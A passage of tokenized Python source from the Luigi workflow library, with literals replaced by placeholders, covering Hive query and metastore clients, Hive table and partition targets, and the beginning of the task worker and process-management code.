configuration . get_config ( ) . get ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def run_hive ( args , check_return_code = True ) : <EOL> """<STR_LIT>""" <EOL> cmd = load_hive_cmd ( ) + args <EOL> p = subprocess . Popen ( cmd , stdout = subprocess . PIPE , stderr = subprocess . PIPE ) <EOL> stdout , stderr = p . communicate ( ) <EOL> if check_return_code and p . returncode != <NUM_LIT:0> : <EOL> raise HiveCommandError ( "<STR_LIT>" . format ( "<STR_LIT:U+0020>" . join ( cmd ) , p . returncode ) , <EOL> stdout , stderr ) <EOL> return stdout <EOL> def run_hive_cmd ( hivecmd , check_return_code = True ) : <EOL> """<STR_LIT>""" <EOL> return run_hive ( [ '<STR_LIT>' , hivecmd ] , check_return_code ) <EOL> def run_hive_script ( script ) : <EOL> """<STR_LIT>""" <EOL> if not os . path . isfile ( script ) : <EOL> raise RuntimeError ( "<STR_LIT>" . format ( script ) ) <EOL> return run_hive ( [ '<STR_LIT>' , script ] ) <EOL> @ six . add_metaclass ( abc . ABCMeta ) <EOL> class HiveClient ( object ) : <EOL> @ abc . abstractmethod <EOL> def table_location ( self , table , database = '<STR_LIT:default>' , partition = None ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ abc . abstractmethod <EOL> def table_schema ( self , table , database = '<STR_LIT:default>' ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ abc . abstractmethod <EOL> def table_exists ( self , table , database = '<STR_LIT:default>' , partition = None ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ abc . abstractmethod <EOL> def partition_spec ( self , partition ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class HiveCommandClient ( HiveClient ) : <EOL> """<STR_LIT>""" <EOL> def table_location ( self , table , database = '<STR_LIT:default>' , partition = None ) : <EOL> cmd = "<STR_LIT>" . format ( database , table ) <EOL> if partition is not None : <EOL> cmd += "<STR_LIT>" . format ( self . partition_spec ( partition ) ) <EOL> stdout = run_hive_cmd ( cmd ) <EOL> for line in stdout . split ( "<STR_LIT:\n>" ) : <EOL> if "<STR_LIT>" in line : <EOL> return line . split ( "<STR_LIT:\t>" ) [ <NUM_LIT:1> ] <EOL> def table_exists ( self , table , database = '<STR_LIT:default>' , partition = None ) : <EOL> if partition is None : <EOL> stdout = run_hive_cmd ( '<STR_LIT>' . format ( database , table ) ) <EOL> return stdout and table . lower ( ) in stdout <EOL> else : <EOL> stdout = run_hive_cmd ( """<STR_LIT>""" % ( database , table , self . partition_spec ( partition ) ) ) <EOL> if stdout : <EOL> return True <EOL> else : <EOL> return False <EOL> def table_schema ( self , table , database = '<STR_LIT:default>' ) : <EOL> describe = run_hive_cmd ( "<STR_LIT>" . format ( database , table ) ) <EOL> if not describe or "<STR_LIT>" in describe : <EOL> return None <EOL> return [ tuple ( [ x . strip ( ) for x in line . strip ( ) . split ( "<STR_LIT:\t>" ) ] ) for line in describe . strip ( ) . split ( "<STR_LIT:\n>" ) ] <EOL> def partition_spec ( self , partition ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT:U+002C>' . join ( [ "<STR_LIT>" . format ( k , v ) for ( k , v ) in <EOL> sorted ( six . iteritems ( partition ) , key = operator . itemgetter ( <NUM_LIT:0> ) ) ] ) <EOL> class ApacheHiveCommandClient ( HiveCommandClient ) : <EOL> """<STR_LIT>""" <EOL> def table_schema ( self , table , database = '<STR_LIT:default>' ) : <EOL> describe = run_hive_cmd ( "<STR_LIT>" . format ( database , table ) , False ) <EOL> if not describe or "<STR_LIT>" in describe : <EOL> return None <EOL> return [ tuple ( [ x . strip ( ) for x in line . strip ( ) . split ( "<STR_LIT:\t>" ) ] ) for line in describe . strip ( ) . split ( "<STR_LIT:\n>" ) ] <EOL> class MetastoreClient ( HiveClient ) : <EOL> def table_location ( self , table , database = '<STR_LIT:default>' , partition = None ) : <EOL> with HiveThriftContext ( ) as client : <EOL> if partition is not None : <EOL> try : <EOL> import hive_metastore . ttypes <EOL> partition_str = self . partition_spec ( partition ) <EOL> thrift_table = client . get_partition_by_name ( database , table , partition_str ) <EOL> except hive_metastore . ttypes . NoSuchObjectException : <EOL> return '<STR_LIT>' <EOL> else : <EOL> thrift_table = client . get_table ( database , table ) <EOL> return thrift_table . sd . location <EOL> def table_exists ( self , table , database = '<STR_LIT:default>' , partition = None ) : <EOL> with HiveThriftContext ( ) as client : <EOL> if partition is None : <EOL> return table in client . get_all_tables ( database ) <EOL> else : <EOL> return partition in self . _existing_partitions ( table , database , client ) <EOL> def _existing_partitions ( self , table , database , client ) : <EOL> def _parse_partition_string ( partition_string ) : <EOL> partition_def = { } <EOL> for part in partition_string . split ( "<STR_LIT:/>" ) : <EOL> name , value = part . split ( "<STR_LIT:=>" ) <EOL> partition_def [ name ] = value <EOL> return partition_def <EOL> partition_strings = client . get_partition_names ( database , table , - <NUM_LIT:1> ) <EOL> return [ _parse_partition_string ( existing_partition ) for existing_partition in partition_strings ] <EOL> def table_schema ( self , table , database = '<STR_LIT:default>' ) : <EOL> with HiveThriftContext ( ) as client : <EOL> return [ ( field_schema . name , field_schema . type ) for field_schema in client . get_schema ( database , table ) ] <EOL> def partition_spec ( self , partition ) : <EOL> return "<STR_LIT:/>" . join ( "<STR_LIT>" % ( k , v ) for ( k , v ) in sorted ( six . iteritems ( partition ) , key = operator . itemgetter ( <NUM_LIT:0> ) ) ) <EOL> class HiveThriftContext ( object ) : <EOL> """<STR_LIT>""" <EOL> def __enter__ ( self ) : <EOL> try : <EOL> from thrift . transport import TSocket <EOL> from thrift . transport import TTransport <EOL> from thrift . protocol import TBinaryProtocol <EOL> from hive_metastore import ThriftHiveMetastore <EOL> config = luigi . configuration . get_config ( ) <EOL> host = config . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> port = config . getint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> transport = TSocket . TSocket ( host , port ) <EOL> transport = TTransport . TBufferedTransport ( transport ) <EOL> protocol = TBinaryProtocol . TBinaryProtocol ( transport ) <EOL> transport . open ( ) <EOL> self . transport = transport <EOL> return ThriftHiveMetastore . Client ( protocol ) <EOL> except ImportError as e : <EOL> raise Exception ( '<STR_LIT>' + str ( e ) ) <EOL> def __exit__ ( self , exc_type , exc_val , exc_tb ) : <EOL> self . transport . close ( ) <EOL> def get_default_client ( ) : <EOL> syntax = get_hive_syntax ( ) <EOL> if syntax == "<STR_LIT>" : <EOL> return ApacheHiveCommandClient ( ) <EOL> elif syntax == "<STR_LIT>" : <EOL> return MetastoreClient ( ) <EOL> else : <EOL> return HiveCommandClient ( ) <EOL> client = get_default_client ( ) <EOL> class HiveQueryTask ( luigi . contrib . hadoop . BaseHadoopJobTask ) : <EOL> """<STR_LIT>""" <EOL> n_reduce_tasks = None <EOL> bytes_per_reducer = None <EOL> reducers_max = None <EOL> @ abc . abstractmethod <EOL> def query ( self ) : <EOL> """<STR_LIT>""" <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> def hiverc ( self ) : <EOL> """<STR_LIT>""" <EOL> return luigi . configuration . get_config ( ) . get ( '<STR_LIT>' , '<STR_LIT>' , default = None ) <EOL> def hiveconfs ( self ) : <EOL> """<STR_LIT>""" <EOL> jcs = { } <EOL> jcs [ '<STR_LIT>' ] = "<STR_LIT:'>" + self . task_id + "<STR_LIT:'>" <EOL> if self . n_reduce_tasks is not None : <EOL> jcs [ '<STR_LIT>' ] = self . n_reduce_tasks <EOL> if self . pool is not None : <EOL> scheduler_type = luigi . configuration . get_config ( ) . get ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if scheduler_type == '<STR_LIT>' : <EOL> jcs [ '<STR_LIT>' ] = self . pool <EOL> elif scheduler_type == '<STR_LIT>' : <EOL> jcs [ '<STR_LIT>' ] = self . pool <EOL> if self . bytes_per_reducer is not None : <EOL> jcs [ '<STR_LIT>' ] = self . bytes_per_reducer <EOL> if self . reducers_max is not None : <EOL> jcs [ '<STR_LIT>' ] = self . reducers_max <EOL> return jcs <EOL> def job_runner ( self ) : <EOL> return HiveQueryRunner ( ) <EOL> class HiveQueryRunner ( luigi . contrib . hadoop . JobRunner ) : <EOL> """<STR_LIT>""" <EOL> def prepare_outputs ( self , job ) : <EOL> """<STR_LIT>""" <EOL> outputs = flatten ( job . output ( ) ) <EOL> for o in outputs : <EOL> if isinstance ( o , FileSystemTarget ) : <EOL> parent_dir = os . path . dirname ( o . path ) <EOL> if parent_dir and not o . fs . exists ( parent_dir ) : <EOL> logger . info ( "<STR_LIT>" , parent_dir ) <EOL> try : <EOL> o . fs . mkdir ( parent_dir ) <EOL> except FileAlreadyExists : <EOL> pass <EOL> def run_job ( self , job , tracking_url_callback = None ) : <EOL> if tracking_url_callback is not None : <EOL> warnings . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" , DeprecationWarning ) <EOL> self . prepare_outputs ( job ) <EOL> with tempfile . NamedTemporaryFile ( ) as f : <EOL> query = job . query ( ) <EOL> if isinstance ( query , unicode ) : <EOL> query = query . encode ( '<STR_LIT:utf8>' ) <EOL> f . write ( query ) <EOL> f . flush ( ) <EOL> arglist = load_hive_cmd ( ) + [ '<STR_LIT>' , f . name ] <EOL> hiverc = job . hiverc ( ) <EOL> if hiverc : <EOL> if isinstance ( hiverc , str ) : <EOL> hiverc = [ hiverc ] <EOL> for rcfile in hiverc : <EOL> arglist += [ '<STR_LIT>' , rcfile ] <EOL> if job . hiveconfs ( ) : <EOL> for k , v in six . iteritems ( job . hiveconfs ( ) ) : <EOL> arglist += [ '<STR_LIT>' , '<STR_LIT>' . format ( k , v ) ] <EOL> logger . info ( arglist ) <EOL> return luigi . contrib . hadoop . run_and_track_hadoop_job ( arglist , job . set_tracking_url ) <EOL> class HiveTableTarget ( luigi . Target ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , table , database = '<STR_LIT:default>' , client = None ) : <EOL> self . database = database <EOL> self . table = table <EOL> self . hive_cmd = load_hive_cmd ( ) <EOL> if client is None : <EOL> client = get_default_client ( ) <EOL> self . client = client <EOL> def exists ( self ) : <EOL> logger . debug ( "<STR_LIT>" , self . database , self . table ) <EOL> return self . client . table_exists ( self . table , self . database ) <EOL> @ property <EOL> def path ( self ) : <EOL> """<STR_LIT>""" <EOL> location = self . client . table_location ( self . table , self . database ) <EOL> if not location : <EOL> raise Exception ( "<STR_LIT>" . format ( str ( self ) ) ) <EOL> return location <EOL> def open ( self , mode ) : <EOL> return NotImplementedError ( "<STR_LIT>" ) <EOL> class HivePartitionTarget ( luigi . Target ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , table , partition , database = '<STR_LIT:default>' , fail_missing_table = True , client = None ) : <EOL> self . database = database <EOL> self . table = table <EOL> self . partition = partition <EOL> if client is None : <EOL> client = get_default_client ( ) <EOL> self . client = client <EOL> self . fail_missing_table = fail_missing_table <EOL> def exists ( self ) : <EOL> try : <EOL> logger . debug ( "<STR_LIT>" . format ( d = self . database , t = self . table , p = str ( self . partition ) ) ) <EOL> return self . client . table_exists ( self . table , self . database , self . partition ) <EOL> except HiveCommandError : <EOL> if self . fail_missing_table : <EOL> raise <EOL> else : <EOL> if self . client . table_exists ( self . table , self . database ) : <EOL> raise <EOL> else : <EOL> return False <EOL> @ property <EOL> def path ( self ) : <EOL> """<STR_LIT>""" <EOL> location = self . client . table_location ( self . table , self . database , self . partition ) <EOL> if not location : <EOL> raise Exception ( "<STR_LIT>" . format ( str ( self ) ) ) <EOL> return location <EOL> def open ( self , mode ) : <EOL> return NotImplementedError ( "<STR_LIT>" ) <EOL> class ExternalHiveTask ( luigi . ExternalTask ) : <EOL> """<STR_LIT>""" <EOL> database = luigi . Parameter ( default = '<STR_LIT:default>' ) <EOL> table = luigi . Parameter ( ) <EOL> partition = luigi . Parameter ( default = None , description = '<STR_LIT>' ) <EOL> def output ( self ) : <EOL> if self . partition is not None : <EOL> assert self . partition , "<STR_LIT>" <EOL> return HivePartitionTarget ( table = self . table , <EOL> partition = self . partition , <EOL> database = self . database ) <EOL> else : <EOL> return HiveTableTarget ( self . table , self . database ) </s>
<s> """<STR_LIT>""" <EOL> import warnings <EOL> from luigi . contrib . hdfs import * <EOL> warnings . warn ( "<STR_LIT>" , <EOL> DeprecationWarning ) </s>
<s> """<STR_LIT>""" <EOL> import collections <EOL> import getpass <EOL> import logging <EOL> import multiprocessing <EOL> import os <EOL> import signal <EOL> import subprocess <EOL> import sys <EOL> try : <EOL> import Queue <EOL> except ImportError : <EOL> import queue as Queue <EOL> import random <EOL> import socket <EOL> import threading <EOL> import time <EOL> import traceback <EOL> import types <EOL> import warnings <EOL> from luigi import six <EOL> from luigi import notifications <EOL> from luigi . event import Event <EOL> from luigi . task_register import load_task <EOL> from luigi . scheduler import DISABLED , DONE , FAILED , PENDING , UNKNOWN , CentralPlannerScheduler <EOL> from luigi . target import Target <EOL> from luigi . task import Task , flatten , getpaths , Config <EOL> from luigi . task_register import TaskClassException <EOL> from luigi . task_status import RUNNING <EOL> from luigi . parameter import FloatParameter , IntParameter , BoolParameter <EOL> try : <EOL> import simplejson as json <EOL> except ImportError : <EOL> import json <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> fork_lock = threading . Lock ( ) <EOL> _WAIT_INTERVAL_EPS = <NUM_LIT> <EOL> def _is_external ( task ) : <EOL> return task . run is None or task . run == NotImplemented <EOL> class TaskException ( Exception ) : <EOL> pass <EOL> class TaskProcess ( multiprocessing . Process ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , task , worker_id , result_queue , tracking_url_callback , <EOL> status_message_callback , random_seed = False , worker_timeout = <NUM_LIT:0> ) : <EOL> super ( TaskProcess , self ) . __init__ ( ) <EOL> self . task = task <EOL> self . worker_id = worker_id <EOL> self . result_queue = result_queue <EOL> self . tracking_url_callback = tracking_url_callback <EOL> self . status_message_callback = status_message_callback <EOL> self . random_seed = random_seed <EOL> if task . worker_timeout is not None : <EOL> worker_timeout = task . worker_timeout <EOL> self . timeout_time = time . time ( ) + worker_timeout if worker_timeout else None <EOL> def _run_get_new_deps ( self ) : <EOL> self . task . set_tracking_url = self . tracking_url_callback <EOL> self . task . set_status_message = self . status_message_callback <EOL> def deprecated_tracking_url_callback ( * args , ** kwargs ) : <EOL> warnings . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" , DeprecationWarning ) <EOL> self . tracking_url_callback ( * args , ** kwargs ) <EOL> run_again = False <EOL> try : <EOL> task_gen = self . task . run ( tracking_url_callback = deprecated_tracking_url_callback ) <EOL> except TypeError as ex : <EOL> if '<STR_LIT>' not in str ( ex ) : <EOL> raise <EOL> run_again = True <EOL> if run_again : <EOL> task_gen = self . task . run ( ) <EOL> self . task . set_tracking_url = None <EOL> self . task . set_status_message = None <EOL> if not isinstance ( task_gen , types . GeneratorType ) : <EOL> return None <EOL> next_send = None <EOL> while True : <EOL> try : <EOL> if next_send is None : <EOL> requires = six . next ( task_gen ) <EOL> else : <EOL> requires = task_gen . send ( next_send ) <EOL> except StopIteration : <EOL> return None <EOL> new_req = flatten ( requires ) <EOL> new_deps = [ ( t . task_module , t . task_family , t . to_str_params ( ) ) <EOL> for t in new_req ] <EOL> if all ( t . complete ( ) for t in new_req ) : <EOL> next_send = getpaths ( requires ) <EOL> else : <EOL> return new_deps <EOL> def run ( self ) : <EOL> logger . info ( '<STR_LIT>' , os . getpid ( ) , self . worker_id , self . task ) <EOL> if self . random_seed : <EOL> random . seed ( ( os . getpid ( ) , time . time ( ) ) ) <EOL> status = FAILED <EOL> expl = '<STR_LIT>' <EOL> missing = [ ] <EOL> new_deps = [ ] <EOL> try : <EOL> if not _is_external ( self . task ) : <EOL> missing = [ dep . task_id for dep in self . task . deps ( ) if not dep . complete ( ) ] <EOL> if missing : <EOL> deps = '<STR_LIT>' if len ( missing ) == <NUM_LIT:1> else '<STR_LIT>' <EOL> raise RuntimeError ( '<STR_LIT>' % ( deps , '<STR_LIT:U+002CU+0020>' . join ( missing ) ) ) <EOL> self . task . trigger_event ( Event . START , self . task ) <EOL> t0 = time . time ( ) <EOL> status = None <EOL> if _is_external ( self . task ) : <EOL> if self . task . complete ( ) : <EOL> status = DONE <EOL> else : <EOL> status = FAILED <EOL> expl = '<STR_LIT>' '<STR_LIT>' <EOL> else : <EOL> new_deps = self . _run_get_new_deps ( ) <EOL> status = DONE if not new_deps else PENDING <EOL> if new_deps : <EOL> logger . info ( <EOL> '<STR_LIT>' , <EOL> os . getpid ( ) , self . worker_id , self . task ) <EOL> elif status == DONE : <EOL> self . task . trigger_event ( <EOL> Event . PROCESSING_TIME , self . task , time . time ( ) - t0 ) <EOL> expl = self . task . on_success ( ) <EOL> logger . info ( '<STR_LIT>' , os . getpid ( ) , <EOL> self . worker_id , self . task ) <EOL> self . task . trigger_event ( Event . SUCCESS , self . task ) <EOL> except KeyboardInterrupt : <EOL> raise <EOL> except BaseException as ex : <EOL> status = FAILED <EOL> logger . exception ( "<STR_LIT>" , os . getpid ( ) , self . worker_id , self . task ) <EOL> self . task . trigger_event ( Event . FAILURE , self . task , ex ) <EOL> raw_error_message = self . task . on_failure ( ex ) <EOL> expl = raw_error_message <EOL> finally : <EOL> self . result_queue . put ( <EOL> ( self . task . task_id , status , expl , missing , new_deps ) ) <EOL> def _recursive_terminate ( self ) : <EOL> import psutil <EOL> try : <EOL> parent = psutil . Process ( self . pid ) <EOL> children = parent . children ( recursive = True ) <EOL> super ( TaskProcess , self ) . terminate ( ) <EOL> parent . wait ( ) <EOL> for child in children : <EOL> try : <EOL> child . terminate ( ) <EOL> except psutil . NoSuchProcess : <EOL> continue <EOL> except psutil . NoSuchProcess : <EOL> return <EOL> def terminate ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return self . _recursive_terminate ( ) <EOL> except ImportError : <EOL> return super ( TaskProcess , self ) . terminate ( ) <EOL> class SingleProcessPool ( object ) : <EOL> """<STR_LIT>""" <EOL> def apply_async ( self , function , args ) : <EOL> return function ( * args ) <EOL> def close ( self ) : <EOL> pass <EOL> def join ( self ) : <EOL> pass <EOL> class DequeQueue ( collections . deque ) : <EOL> """<STR_LIT>""" <EOL> def put ( self , obj , block = None , timeout = None ) : <EOL> return self . append ( obj ) <EOL> def get ( self , block = None , timeout = None ) : <EOL> try : <EOL> return self . pop ( ) <EOL> except IndexError : <EOL> raise Queue . Empty <EOL> class AsyncCompletionException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , trace ) : <EOL> self . trace = trace <EOL> class TracebackWrapper ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , trace ) : <EOL> self . trace = trace <EOL> def check_complete ( task , out_queue ) : <EOL> """<STR_LIT>""" <EOL> logger . debug ( "<STR_LIT>" , task ) <EOL> try : <EOL> is_complete = task . complete ( ) <EOL> except Exception : <EOL> is_complete = TracebackWrapper ( traceback . format_exc ( ) ) <EOL> out_queue . put ( ( task , is_complete ) ) <EOL> class worker ( Config ) : <EOL> ping_interval = FloatParameter ( default = <NUM_LIT:1.0> , <EOL> config_path = dict ( section = '<STR_LIT>' , name = '<STR_LIT>' ) ) <EOL> keep_alive = BoolParameter ( default = False , <EOL> config_path = dict ( section = '<STR_LIT>' , name = '<STR_LIT>' ) ) <EOL> count_uniques = BoolParameter ( default = False , <EOL> config_path = dict ( section = '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> description = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> wait_interval = FloatParameter ( default = <NUM_LIT:1.0> , <EOL> config_path = dict ( section = '<STR_LIT>' , name = '<STR_LIT>' ) ) <EOL> wait_jitter = FloatParameter ( default = <NUM_LIT> ) <EOL> max_reschedules = IntParameter ( default = <NUM_LIT:1> , <EOL> config_path = dict ( section = '<STR_LIT>' , name = '<STR_LIT>' ) ) <EOL> timeout = IntParameter ( default = <NUM_LIT:0> , <EOL> config_path = dict ( section = '<STR_LIT>' , name = '<STR_LIT>' ) ) <EOL> task_limit = IntParameter ( default = None , <EOL> config_path = dict ( section = '<STR_LIT>' , name = '<STR_LIT>' ) ) <EOL> retry_external_tasks = BoolParameter ( default = False , <EOL> config_path = dict ( section = '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> description = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> no_install_shutdown_handler = BoolParameter ( default = False , <EOL> description = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> class KeepAliveThread ( threading . Thread ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , scheduler , worker_id , ping_interval ) : <EOL> super ( KeepAliveThread , self ) . __init__ ( ) <EOL> self . _should_stop = threading . Event ( ) <EOL> self . _scheduler = scheduler <EOL> self . _worker_id = worker_id <EOL> self . _ping_interval = ping_interval <EOL> def stop ( self ) : <EOL> self . _should_stop . set ( ) <EOL> def run ( self ) : <EOL> while True : <EOL> self . _should_stop . wait ( self . _ping_interval ) <EOL> if self . _should_stop . is_set ( ) : <EOL> logger . info ( "<STR_LIT>" % self . _worker_id ) <EOL> break <EOL> with fork_lock : <EOL> try : <EOL> self . _scheduler . ping ( worker = self . _worker_id ) <EOL> except : <EOL> logger . warning ( '<STR_LIT>' ) <EOL> class Worker ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , scheduler = None , worker_id = None , worker_processes = <NUM_LIT:1> , assistant = False , ** kwargs ) : <EOL> if scheduler is None : <EOL> scheduler = CentralPlannerScheduler ( ) <EOL> self . worker_processes = int ( worker_processes ) <EOL> self . _worker_info = self . _generate_worker_info ( ) <EOL> if not worker_id : <EOL> worker_id = '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( [ '<STR_LIT>' % ( k , v ) for k , v in self . _worker_info ] ) <EOL> self . _config = worker ( ** kwargs ) <EOL> assert self . _config . wait_interval >= _WAIT_INTERVAL_EPS , "<STR_LIT>" <EOL> assert self . _config . wait_jitter >= <NUM_LIT:0.0> , "<STR_LIT>" <EOL> self . _id = worker_id <EOL> self . _scheduler = scheduler <EOL> self . _assistant = assistant <EOL> self . _stop_requesting_work = False <EOL> self . host = socket . gethostname ( ) <EOL> self . _scheduled_tasks = { } <EOL> self . _suspended_tasks = { } <EOL> self . _first_task = None <EOL> self . add_succeeded = True <EOL> self . run_succeeded = True <EOL> self . unfulfilled_counts = collections . defaultdict ( int ) <EOL> if not self . _config . no_install_shutdown_handler : <EOL> try : <EOL> signal . signal ( signal . SIGUSR1 , self . handle_interrupt ) <EOL> except AttributeError : <EOL> pass <EOL> if worker_processes == <NUM_LIT:1> : <EOL> self . _task_result_queue = DequeQueue ( ) <EOL> else : <EOL> self . _task_result_queue = multiprocessing . Queue ( ) <EOL> self . _running_tasks = { } <EOL> self . _add_task_history = [ ] <EOL> self . _get_work_response_history = [ ] <EOL> def _add_task ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> task_id = kwargs [ '<STR_LIT>' ] <EOL> status = kwargs [ '<STR_LIT:status>' ] <EOL> runnable = kwargs [ '<STR_LIT>' ] <EOL> task = self . _scheduled_tasks . get ( task_id ) <EOL> if task : <EOL> msg = ( task , status , runnable ) <EOL> self . _add_task_history . append ( msg ) <EOL> self . _scheduler . add_task ( * args , ** kwargs ) <EOL> logger . info ( '<STR_LIT>' , task_id , status ) <EOL> def __enter__ ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _keep_alive_thread = KeepAliveThread ( self . _scheduler , self . _id , self . _config . ping_interval ) <EOL> self . _keep_alive_thread . daemon = True <EOL> self . _keep_alive_thread . start ( ) <EOL> return self <EOL> def __exit__ ( self , type , value , traceback ) : <EOL> """<STR_LIT>""" <EOL> self . _keep_alive_thread . stop ( ) <EOL> self . _keep_alive_thread . join ( ) <EOL> for task in self . _running_tasks . values ( ) : <EOL> if task . is_alive ( ) : <EOL> task . terminate ( ) <EOL> return False <EOL> def _generate_worker_info ( self ) : <EOL> args = [ ( '<STR_LIT>' , '<STR_LIT>' % random . randrange ( <NUM_LIT:0> , <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , self . worker_processes ) ] <EOL> try : <EOL> args += [ ( '<STR_LIT:host>' , socket . gethostname ( ) ) ] <EOL> except BaseException : <EOL> pass <EOL> try : <EOL> args += [ ( '<STR_LIT:username>' , getpass . getuser ( ) ) ] <EOL> except BaseException : <EOL> pass <EOL> try : <EOL> args += [ ( '<STR_LIT>' , os . getpid ( ) ) ] <EOL> except BaseException : <EOL> pass <EOL> try : <EOL> sudo_user = os . getenv ( "<STR_LIT>" ) <EOL> if sudo_user : <EOL> args . append ( ( '<STR_LIT>' , sudo_user ) ) <EOL> except BaseException : <EOL> pass <EOL> return args <EOL> def _validate_task ( self , task ) : <EOL> if not isinstance ( task , Task ) : <EOL> raise TaskException ( '<STR_LIT>' % task ) <EOL> if not task . initialized ( ) : <EOL> raise TaskException ( '<STR_LIT>' % task . __class__ . __name__ ) <EOL> def _log_complete_error ( self , task , tb ) : <EOL> log_msg = "<STR_LIT>" . format ( task = task , tb = tb ) <EOL> logger . warning ( log_msg ) <EOL> def _log_dependency_error ( self , task , tb ) : <EOL> log_msg = "<STR_LIT>" . format ( task = task , tb = tb ) <EOL> logger . warning ( log_msg ) <EOL> def _log_unexpected_error ( self , task ) : <EOL> logger . exception ( "<STR_LIT>" , task ) <EOL> def _email_complete_error ( self , task , formatted_traceback ) : <EOL> self . _email_error ( task , formatted_traceback , <EOL> subject = "<STR_LIT>" , <EOL> headline = "<STR_LIT>" , <EOL> ) <EOL> def _email_dependency_error ( self , task , formatted_traceback ) : <EOL> self . _email_error ( task , formatted_traceback , <EOL> subject = "<STR_LIT>" , <EOL> headline = "<STR_LIT>" , <EOL> ) <EOL> def _email_unexpected_error ( self , task , formatted_traceback ) : <EOL> self . _email_error ( task , formatted_traceback , <EOL> subject = "<STR_LIT>" , <EOL> headline = "<STR_LIT>" , <EOL> ) <EOL> def _email_task_failure ( self , task , formatted_traceback ) : <EOL> self . _email_error ( task , formatted_traceback , <EOL> subject = "<STR_LIT>" , <EOL> headline = "<STR_LIT>" , <EOL> ) <EOL> def _email_error ( self , task , formatted_traceback , subject , headline ) : <EOL> formatted_subject = subject . format ( task = task , host = self . host ) <EOL> command = subprocess . list2cmdline ( sys . argv ) <EOL> message = notifications . format_task_error ( headline , task , command , formatted_traceback ) <EOL> notifications . send_error_email ( formatted_subject , message , task . owner_email ) <EOL> def add ( self , task , multiprocess = False ) : <EOL> """<STR_LIT>""" <EOL> if self . _first_task is None and hasattr ( task , '<STR_LIT>' ) : <EOL> self . _first_task = task . task_id <EOL> self . add_succeeded = True <EOL> if multiprocess : <EOL> queue = multiprocessing . Manager ( ) . Queue ( ) <EOL> pool = multiprocessing . Pool ( ) <EOL> else : <EOL> queue = DequeQueue ( ) <EOL> pool = SingleProcessPool ( ) <EOL> self . _validate_task ( task ) <EOL> pool . apply_async ( check_complete , [ task , queue ] ) <EOL> queue_size = <NUM_LIT:1> <EOL> try : <EOL> seen = set ( [ task . task_id ] ) <EOL> while queue_size : <EOL> current = queue . get ( ) <EOL> queue_size -= <NUM_LIT:1> <EOL> item , is_complete = current <EOL> for next in self . _add ( item , is_complete ) : <EOL> if next . task_id not in seen : <EOL> self . _validate_task ( next ) <EOL> seen . add ( next . task_id ) <EOL> pool . apply_async ( check_complete , [ next , queue ] ) <EOL> queue_size += <NUM_LIT:1> <EOL> except ( KeyboardInterrupt , TaskException ) : <EOL> raise <EOL> except Exception as ex : <EOL> self . add_succeeded = False <EOL> formatted_traceback = traceback . format_exc ( ) <EOL> self . _log_unexpected_error ( task ) <EOL> task . trigger_event ( Event . BROKEN_TASK , task , ex ) <EOL> self . _email_unexpected_error ( task , formatted_traceback ) <EOL> raise <EOL> finally : <EOL> pool . close ( ) <EOL> pool . join ( ) <EOL> return self . add_succeeded <EOL> def _add ( self , task , is_complete ) : <EOL> if self . _config . task_limit is not None and len ( self . _scheduled_tasks ) >= self . _config . task_limit : <EOL> logger . warning ( '<STR_LIT>' , task , self . _config . task_limit ) <EOL> return <EOL> formatted_traceback = None <EOL> try : <EOL> self . _check_complete_value ( is_complete ) <EOL> except KeyboardInterrupt : <EOL> raise <EOL> except AsyncCompletionException as ex : <EOL> formatted_traceback = ex . trace <EOL> except BaseException : <EOL> formatted_traceback = traceback . format_exc ( ) <EOL> if formatted_traceback is not None : <EOL> self . add_succeeded = False <EOL> self . _log_complete_error ( task , formatted_traceback ) <EOL> task . trigger_event ( Event . DEPENDENCY_MISSING , task ) <EOL> self . _email_complete_error ( task , formatted_traceback ) <EOL> deps = None <EOL> status = UNKNOWN <EOL> runnable = False <EOL> elif is_complete : <EOL> deps = None <EOL> status = DONE <EOL> runnable = False <EOL> task . trigger_event ( Event . DEPENDENCY_PRESENT , task ) <EOL> elif _is_external ( task ) : <EOL> deps = None <EOL> status = PENDING <EOL> runnable = worker ( ) . retry_external_tasks <EOL> task . trigger_event ( Event . DEPENDENCY_MISSING , task ) <EOL> logger . warning ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , task ) <EOL> else : <EOL> try : <EOL> deps = task . deps ( ) <EOL> except Exception as ex : <EOL> formatted_traceback = traceback . format_exc ( ) <EOL> self . add_succeeded = False <EOL> self . _log_dependency_error ( task , formatted_traceback ) <EOL> task . trigger_event ( Event . BROKEN_TASK , task , ex ) <EOL> self . _email_dependency_error ( task , formatted_traceback ) <EOL> deps = None <EOL> status = UNKNOWN <EOL> runnable = False <EOL> else : <EOL> status = PENDING <EOL> runnable = True <EOL> if task . disabled : <EOL> status = DISABLED <EOL> if deps : <EOL> for d in deps : <EOL> self . _validate_dependency ( d ) <EOL> task . trigger_event ( Event . 